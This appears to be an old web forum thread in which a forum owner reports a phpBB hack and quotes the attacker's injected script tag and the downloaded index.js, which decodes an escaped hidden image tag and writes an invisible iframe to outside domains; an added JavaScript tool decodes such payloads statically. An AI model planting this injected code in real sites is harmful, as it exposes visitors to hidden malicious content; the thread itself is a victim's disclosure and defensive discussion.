Forum Hacked!

Status
Not open for further replies.

Brad101

New member
Jun 25, 2006
A new forum I’ve been developing/promoting was hacked very recently. I’m not sure how they did it, but I’m improving the forum’s security at the moment.

The hacker(s) inserted a single line of code in one critical file.

<script src="http://healingeczema.com/index.js"></script>

I downloaded ‘index.js’:

var var37458745 =
unescape(
"%3C%69%6D%67%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%6D%61%69%6E%73%79%73%74%65"+
"%6D%73%69%74%65%2E%63%6F%6D%2F%63%6F%75%6E%74%65%72%2F%63%6F%75%6E%74%65%72%2E%70%68%70%27"+
"%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E"
);
document.write(var37458745);

document.write('<iframe src="http://baarish.co.uk/go.php" style=width:0;height:0;visibility:none;border:0"></iframe>');

Anyone else had a forum/site hacked in a similar way?
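
A way to triage a file like the `index.js` quoted above without loading it in a browser, as an added example that is not part of the original post: it statically decodes the `unescape()` argument and lists every remote tag the script would write, flagging zero-sized ones. The function names and the `example.invalid` hosts in the constructed sample are assumptions made for illustration.

```javascript
// Static triage for an injected script: decode unescape() payloads WITHOUT
// running the file, then list the remote resources it would load.

// Decode %XX and %uXXXX the way the legacy unescape() does.
function decodeEscapes(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Find unescape("..." + "...") calls and return each decoded argument.
function decodedPayloads(source) {
  const call = /unescape\(\s*((?:"[^"]*"|'[^']*')(?:\s*\+\s*(?:"[^"]*"|'[^']*'))*)\s*\)/g;
  const out = [];
  for (const m of source.matchAll(call)) {
    const joined = [...m[1].matchAll(/"([^"]*)"|'([^']*)'/g)]
      .map(p => p[1] ?? p[2]).join('');
    out.push(decodeEscapes(joined));
  }
  return out;
}

// Report every img/iframe/script tag, its src, and whether it is zero-sized.
function analyze(source) {
  const chunks = [
    ...decodedPayloads(source).map(text => ({ text, decoded: true })),
    { text: source, decoded: false },
  ];
  const findings = [];
  for (const { text, decoded } of chunks) {
    for (const m of text.matchAll(/<(img|iframe|script)\b[^>]*>/gi)) {
      const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(m[0]);
      findings.push({
        tag: m[1].toLowerCase(),
        url: src ? src[1] : null,
        hidden: /\b(?:width|height)\s*[=:]\s*["']?0(?![\d.])/i.test(m[0]),
        decoded,
      });
    }
  }
  return findings;
}

// Constructed sample with the same shape as the file in the post (placeholder hosts).
const enc = [..."<img src='http://tracker.example.invalid/c.php' width=0 height=0>"]
  .map(c => '%' + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0'));
const SAMPLE = `var v1 =\nunescape(\n"${enc.slice(0, 30).join('')}"+\n"${enc.slice(30).join('')}"\n);
document.write(v1);
document.write('<iframe src="http://redirect.example.invalid/go.php" style="width:0;height:0;border:0"></iframe>');`;

console.log(analyze(SAMPLE));
```

Findings with `decoded: true` were only visible after decoding, so searching the web root for the plain host name would have missed them.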
 


Twice I had phpBB on my server, and both times I was hacked.
Once every index.html file on the server was replaced. The second time, all my php blog applications were altered along with the board.
Is that the forum software you were running?
 
Yep... had phpBB as well... and got hacked... by Turkish warriors!... Had a good laugh at their site though.
 
I've had phpBB hacked as well - also OC commerce was hacked on my server as well :ak:
 
It's very important to keep phpBB updated to the very latest version. Hopefully the new version 3 will be better in this area. You can probably get more info at their forum.
 
Julez said:

That reminds me, you forgot a useful smiley, Jon:
nunu.gif
 
I did have the latest version. I'll never put phpBB back on my server ever. I'll stick with programming my own. And maybe vBulletin - anyone ever have vBulletin hacked?
 
I will never run phpBB on anything I use because it is hacked WAY too much. If you're serious about the site you are building a forum for, vBulletin is the way to go.
 
Yep, it does seem vBulletin has the best reputation, by far. However, considering the amount of time and effort I’ve invested in phpBB, I’m reluctant to swap. The only downfall with phpBB, as far as I can tell, is the security issues. But, now I’ve installed CrackerTracker, I’m hoping there won’t be too many more in the future.

Additionally, the advanced URL mod (http://boards.phpbb-seo.com/phpbb-mod-rewrite-vf33/) available for phpBB is nothing short of superb as far as SEO’ing a forum is concerned. So, unless the forum gets hacked again, I will be definitely using phpBB in the future.

One new idea I have stems from the success of Markus’ Plentyoffish dating site. I’m thinking about combining a dating site and a forum – a community dating forum. Where members can IM each other, enter chat rooms, conduct polls, share thoughts in the forum, etc – and it will be totally free of course. But, it’s just an idea at the moment…
 